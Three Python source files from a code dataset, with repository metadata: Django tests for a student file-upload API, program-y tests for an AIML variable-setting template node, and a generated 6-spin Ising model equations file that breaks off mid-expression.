2022-03-03T09:55:57.000Z
|
2022-03-03T09:55:57.000Z
|
api/tests/test_student_upload.py
|
matchd-ch/matchd-backend
|
84be4aab1b4708cae50a8988301b15df877c8db0
|
[
"Apache-2.0"
] | 7
|
2022-02-09T10:44:53.000Z
|
2022-03-28T03:29:43.000Z
|
api/tests/test_student_upload.py
|
matchd-ch/matchd-backend
|
84be4aab1b4708cae50a8988301b15df877c8db0
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from django.contrib.auth.models import AnonymousUser
from db.models import AttachmentKey
@pytest.mark.django_db
def test_upload_student_image(login, user_student, upload, file_image_jpg, attachments_for_user):
login(user_student)
data, errors = upload(user_student, AttachmentKey.STUDENT_AVATAR, file_image_jpg)
assert data is not None
assert errors is None
assert data.get('upload') is not None
assert data.get('upload').get('success')
attachments = attachments_for_user(user_student, AttachmentKey.STUDENT_AVATAR)
assert len(attachments) == 1
@pytest.mark.django_db
def test_upload_student_document(login, user_student, upload, file_document_pdf,
attachments_for_user):
login(user_student)
data, errors = upload(user_student, AttachmentKey.STUDENT_DOCUMENTS, file_document_pdf)
assert data is not None
assert errors is None
assert data.get('upload') is not None
assert data.get('upload').get('success')
attachments = attachments_for_user(user_student, AttachmentKey.STUDENT_DOCUMENTS)
assert len(attachments) == 1
@pytest.mark.django_db
def test_upload_student_video(login, user_student, upload, file_video_mp4, attachments_for_user):
login(user_student)
data, errors = upload(user_student, AttachmentKey.STUDENT_DOCUMENTS, file_video_mp4)
assert data is not None
assert errors is None
assert data.get('upload') is not None
assert data.get('upload').get('success') is False
errors = data.get('upload').get('errors')
assert errors is not None
assert 'file' in errors
attachments = attachments_for_user(user_student, AttachmentKey.STUDENT_DOCUMENTS)
assert len(attachments) == 0
@pytest.mark.django_db
def test_upload_without_login(upload, file_image_jpg):
data, errors = upload(AnonymousUser(), AttachmentKey.STUDENT_AVATAR, file_image_jpg)
assert data is not None
assert errors is not None
assert data.get('upload') is None
@pytest.mark.django_db
def test_upload_company_avatar_as_student(login, user_student, upload, file_image_jpg,
attachments_for_user):
login(user_student)
data, errors = upload(user_student, AttachmentKey.COMPANY_AVATAR, file_image_jpg)
assert data is not None
assert errors is None
assert data.get('upload') is not None
assert data.get('upload').get('success') is False
errors = data.get('upload').get('errors')
assert errors is not None
assert 'key' in errors
attachments = attachments_for_user(user_student, AttachmentKey.COMPANY_AVATAR)
assert len(attachments) == 0
@pytest.mark.django_db
def test_upload_too_many_uploads(login, user_student, upload, file_image_jpg, attachments_for_user):
login(user_student)
upload(user_student, AttachmentKey.STUDENT_AVATAR, file_image_jpg)
data, errors = upload(user_student, AttachmentKey.STUDENT_AVATAR, file_image_jpg)
assert data is not None
assert errors is None
assert data.get('upload') is not None
assert data.get('upload').get('success') is False
errors = data.get('upload').get('errors')
assert errors is not None
assert 'key' in errors
attachments = attachments_for_user(user_student, AttachmentKey.STUDENT_AVATAR)
assert len(attachments) == 1
| 35.242105
| 100
| 0.741039
| 456
| 3,348
| 5.208333
| 0.105263
| 0.097263
| 0.056842
| 0.094737
| 0.907368
| 0.877053
| 0.864421
| 0.840421
| 0.824421
| 0.801263
| 0
| 0.002532
| 0.174134
| 3,348
| 94
| 101
| 35.617021
| 0.85642
| 0
| 0
| 0.760563
| 0
| 0
| 0.043907
| 0
| 0
| 0
| 0
| 0
| 0.478873
| 1
| 0.084507
| false
| 0
| 0.042254
| 0
| 0.126761
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6fa44f9d74e32d1d721dde22028f9e10a5647d5e
| 6,101
|
py
|
Python
|
test/programytest/parser/template/node_tests/test_set.py
|
cen-ai/program-y
|
a753667638147544c54dbebd9f1c8f9ae7f2159e
|
[
"MIT"
] | 5
|
2018-08-21T00:13:45.000Z
|
2018-09-01T20:00:55.000Z
|
test/programytest/parser/template/node_tests/test_set.py
|
cen-ai/program-y
|
a753667638147544c54dbebd9f1c8f9ae7f2159e
|
[
"MIT"
] | 1
|
2018-09-12T18:30:17.000Z
|
2018-09-12T18:30:17.000Z
|
test/programytest/parser/template/node_tests/test_set.py
|
cen-ai/program-y
|
a753667638147544c54dbebd9f1c8f9ae7f2159e
|
[
"MIT"
] | 5
|
2018-08-21T00:08:36.000Z
|
2018-09-23T06:11:04.000Z
|
import xml.etree.ElementTree as ET
from programy.parser.template.nodes.base import TemplateNode
from programy.parser.template.nodes.set import TemplateSetNode
from programy.parser.template.nodes.word import TemplateWordNode
from programy.dialog.dialog import Question
from programytest.parser.base import ParserTestsBaseClass
class MockTemplateSetNode(TemplateSetNode):
def __init__(self):
TemplateSetNode.__init__(self)
def resolve_to_string(self, context):
raise Exception("This is an error")
class TemplateSetNodeTests(ParserTestsBaseClass):
def test_local_set(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateSetNode()
self.assertIsNotNone(node)
node.name = TemplateWordNode("name")
node.local = True
node.append(TemplateWordNode("keith"))
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello")
conversation.record_dialog(question)
self.assertIsNotNone(conversation.current_question())
result = node.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("keith", result)
self.assertEqual("keith", question.property("name"))
def test_to_xml_local_set(self):
root = TemplateNode()
node = TemplateSetNode()
node.name = TemplateWordNode("name")
node.local = True
root.append(node)
node.append(TemplateWordNode("keith"))
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><set var="name">keith</set></template>', xml_str)
def test_global_set_allow_overrides_no_default(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
self._client_context.bot.configuration.override_propertys = True
node = TemplateSetNode()
self.assertIsNotNone(node)
node.name = TemplateWordNode("name")
node.local = False
node.append(TemplateWordNode("keith"))
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello")
conversation.record_dialog(question)
self.assertIsNotNone(conversation.current_question())
result = node.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("keith", result)
self.assertEqual("keith", conversation.property("name"))
def test_global_set_allow_overrides_with_default(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
self._client_context.bot.configuration.override_propertys = True
self._client_context.brain.properties.pairs.append(["name", "fred"])
node = TemplateSetNode()
self.assertIsNotNone(node)
node.name = TemplateWordNode("name")
node.local = False
node.append(TemplateWordNode("keith"))
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello")
conversation.record_dialog(question)
self.assertIsNotNone(conversation.current_question())
result = node.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("keith", result)
self.assertEqual("keith", conversation.property("name"))
def test_global_set_deny_overrides_with_default(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
self._client_context.bot.configuration.override_properties = False
self._client_context.brain.properties.pairs.append(["name", "fred"])
node = TemplateSetNode()
self.assertIsNotNone(node)
node.name = TemplateWordNode("name")
node.local = False
node.append(TemplateWordNode("keith"))
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello")
conversation.record_dialog(question)
self.assertIsNotNone(conversation.current_question())
result = node.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("fred", result)
self.assertEqual(None, conversation.property("name"))
def test_to_xml_global_set(self):
root = TemplateNode()
node = TemplateSetNode()
node.name = TemplateWordNode("name")
node.local = False
root.append(node)
node.append(TemplateWordNode("keith"))
xml = root.xml_tree(self._client_context)
self.assertIsNotNone(xml)
xml_str = ET.tostring(xml, "utf-8").decode("utf-8")
self.assertEqual('<template><set name="name">keith</set></template>', xml_str)
def test_node_exception_handling(self):
root = TemplateNode()
node = MockTemplateSetNode()
root.append(node)
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("", result)
| 36.315476
| 86
| 0.686117
| 637
| 6,101
| 6.386185
| 0.135008
| 0.126106
| 0.100295
| 0.056785
| 0.867994
| 0.838987
| 0.820305
| 0.817109
| 0.800885
| 0.785152
| 0
| 0.00248
| 0.206851
| 6,101
| 168
| 87
| 36.315476
| 0.83819
| 0
| 0
| 0.784615
| 0
| 0
| 0.044739
| 0.01098
| 0
| 0
| 0
| 0
| 0.353846
| 1
| 0.069231
| false
| 0
| 0.046154
| 0
| 0.130769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82f29e761d83b5ed1735526aa47189aabcc7a43b
| 33,883
|
py
|
Python
|
coniii/ising_eqn/ising_eqn_6.py
|
bcdaniels/coniii
|
50218dc571135dd08b441361da33fed64a8eebc4
|
[
"MIT"
] | 10
|
2018-01-26T09:52:17.000Z
|
2019-04-02T13:34:53.000Z
|
coniii/ising_eqn/ising_eqn_6.py
|
bcdaniels/coniii
|
50218dc571135dd08b441361da33fed64a8eebc4
|
[
"MIT"
] | 19
|
2017-04-19T17:05:50.000Z
|
2019-01-20T20:54:06.000Z
|
coniii/ising_eqn/ising_eqn_6.py
|
bcdaniels/coniii
|
50218dc571135dd08b441361da33fed64a8eebc4
|
[
"MIT"
] | 3
|
2017-04-19T16:58:05.000Z
|
2018-10-22T19:14:04.000Z
|
# Equations of 6-spin Ising model.
# 30/12/2017
from numpy import zeros, exp
def calc_observables(params):
"""
Give each set of parameters concatenated into one array.
"""
Cout = zeros((21))
H = params[0:6]
J = params[6:21]
Z = +exp(+0)+exp(+H[5]+0)+exp(+H[4]+0)+exp(+H[4]+H[5]+J[14])+exp(+H[3]+0)+exp(+H[3]+H[5]+J[13])+exp(+H[3]+H[4]+J[12])+exp(+H[3]+H[4]+H[5]+J[12]+J[13]+J[14])+exp(+H[2]+0)+exp(+H[2]+H[5]+J[11])+exp(+H[2]+H[4]+J[10])+exp(+H[2]+H[4]+H[5]+J[10]+J[11]+J[14])+exp(+H[2]+H[3]+J[9])+exp(+H[2]+H[3]+H[5]+J[9]+J[11]+J[13])+exp(+H[2]+H[3]+H[4]+J[9]+J[10]+J[12])+exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[1]+0)+exp(+H[1]+H[5]+J[8])+exp(+H[1]+H[4]+J[7])+exp(+H[1]+H[4]+H[5]+J[7]+J[8]+J[14])+exp(+H[1]+H[3]+J[6])+exp(+H[1]+H[3]+H[5]+J[6]+J[8]+J[13])+exp(+H[1]+H[3]+H[4]+J[6]+J[7]+J[12])+exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+J[5])+exp(+H[1]+H[2]+H[5]+J[5]+J[8]+J[11])+exp(+H[1]+H[2]+H[4]+J[5]+J[7]+J[10])+exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[1]+H[2]+H[3]+J[5]+J[6]+J[9])+exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+0)+exp(+H[0]+H[5]+J[4])+exp(+H[0]+H[4]+J[3])+exp(+H[0]+H[4]+H[5]+J[3]+J[4]+J[14])+exp(+H[0]+H[3]+J[2])+exp(+H[0]+H[3]+H[5]+J[2]+J[4]+J[13])+exp(+H[0]+H[3]+H[4]+J[2]+J[3]+J[12])+exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+J[1])+exp(+H[0]+H[2]+H[5]+J[1]+J[4]+J[11])+exp(+H[0]+H[2]+H[4]+J[1]+J[3]+J[10])+exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])+exp(+H[0]+H[2]+H[3]+J[1]+J[2]+J[9])+exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])+exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+J[0])+exp(+H[0]+H[1]+H[5]+J[0]+J[4]+J[8])+exp(+H[0]+H[1]+H[4]+J[0]+J[3]+J[7])+exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])+exp(+H[0]+H[1]+H[3]+J[0]+J[2]+J[6])+exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])+exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+J[0]+J[1]+J[5])+exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])+exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])
Cout[0] = (+exp(+H[0]+0)+exp(+H[0]+H[5]+J[4])+exp(+H[0]+H[4]+J[3])+exp(+H[0]+H[4]+H[5]+J[3]+J[4]+J[14])+exp(+H[0]+H[3]+J[2])+exp(+H[0]+H[3]+H[5]+J[2]+J[4]+J[13])+exp(+H[0]+H[3]+H[4]+J[2]+J[3]+J[12])+exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+J[1])+exp(+H[0]+H[2]+H[5]+J[1]+J[4]+J[11])+exp(+H[0]+H[2]+H[4]+J[1]+J[3]+J[10])+exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])+exp(+H[0]+H[2]+H[3]+J[1]+J[2]+J[9])+exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])+exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+J[0])+exp(+H[0]+H[1]+H[5]+J[0]+J[4]+J[8])+exp(+H[0]+H[1]+H[4]+J[0]+J[3]+J[7])+exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])+exp(+H[0]+H[1]+H[3]+J[0]+J[2]+J[6])+exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])+exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+J[0]+J[1]+J[5])+exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])+exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[1] = (+exp(+H[1]+0)+exp(+H[1]+H[5]+J[8])+exp(+H[1]+H[4]+J[7])+exp(+H[1]+H[4]+H[5]+J[7]+J[8]+J[14])+exp(+H[1]+H[3]+J[6])+exp(+H[1]+H[3]+H[5]+J[6]+J[8]+J[13])+exp(+H[1]+H[3]+H[4]+J[6]+J[7]+J[12])+exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+J[5])+exp(+H[1]+H[2]+H[5]+J[5]+J[8]+J[11])+exp(+H[1]+H[2]+H[4]+J[5]+J[7]+J[10])+exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[1]+H[2]+H[3]+J[5]+J[6]+J[9])+exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+J[0])+exp(+H[0]+H[1]+H[5]+J[0]+J[4]+J[8])+exp(+H[0]+H[1]+H[4]+J[0]+J[3]+J[7])+exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])+exp(+H[0]+H[1]+H[3]+J[0]+J[2]+J[6])+exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])+exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+J[0]+J[1]+J[5])+exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])+exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[2] = (+exp(+H[2]+0)+exp(+H[2]+H[5]+J[11])+exp(+H[2]+H[4]+J[10])+exp(+H[2]+H[4]+H[5]+J[10]+J[11]+J[14])+exp(+H[2]+H[3]+J[9])+exp(+H[2]+H[3]+H[5]+J[9]+J[11]+J[13])+exp(+H[2]+H[3]+H[4]+J[9]+J[10]+J[12])+exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+J[5])+exp(+H[1]+H[2]+H[5]+J[5]+J[8]+J[11])+exp(+H[1]+H[2]+H[4]+J[5]+J[7]+J[10])+exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[1]+H[2]+H[3]+J[5]+J[6]+J[9])+exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+J[1])+exp(+H[0]+H[2]+H[5]+J[1]+J[4]+J[11])+exp(+H[0]+H[2]+H[4]+J[1]+J[3]+J[10])+exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])+exp(+H[0]+H[2]+H[3]+J[1]+J[2]+J[9])+exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])+exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+J[0]+J[1]+J[5])+exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])+exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[3] = (+exp(+H[3]+0)+exp(+H[3]+H[5]+J[13])+exp(+H[3]+H[4]+J[12])+exp(+H[3]+H[4]+H[5]+J[12]+J[13]+J[14])+exp(+H[2]+H[3]+J[9])+exp(+H[2]+H[3]+H[5]+J[9]+J[11]+J[13])+exp(+H[2]+H[3]+H[4]+J[9]+J[10]+J[12])+exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[1]+H[3]+J[6])+exp(+H[1]+H[3]+H[5]+J[6]+J[8]+J[13])+exp(+H[1]+H[3]+H[4]+J[6]+J[7]+J[12])+exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+H[3]+J[5]+J[6]+J[9])+exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[3]+J[2])+exp(+H[0]+H[3]+H[5]+J[2]+J[4]+J[13])+exp(+H[0]+H[3]+H[4]+J[2]+J[3]+J[12])+exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+H[3]+J[1]+J[2]+J[9])+exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])+exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[3]+J[0]+J[2]+J[6])+exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])+exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
Cout[4] = (+exp(+H[4]+0)+exp(+H[4]+H[5]+J[14])+exp(+H[3]+H[4]+J[12])+exp(+H[3]+H[4]+H[5]+J[12]+J[13]+J[14])+exp(+H[2]+H[4]+J[10])+exp(+H[2]+H[4]+H[5]+J[10]+J[11]+J[14])+exp(+H[2]+H[3]+H[4]+J[9]+J[10]+J[12])+exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[1]+H[4]+J[7])+exp(+H[1]+H[4]+H[5]+J[7]+J[8]+J[14])+exp(+H[1]+H[3]+H[4]+J[6]+J[7]+J[12])+exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+H[4]+J[5]+J[7]+J[10])+exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[4]+J[3])+exp(+H[0]+H[4]+H[5]+J[3]+J[4]+J[14])+exp(+H[0]+H[3]+H[4]+J[2]+J[3]+J[12])+exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+H[4]+J[1]+J[3]+J[10])+exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])+exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[4]+J[0]+J[3]+J[7])+exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])+exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])+exp(+H[0]+H[1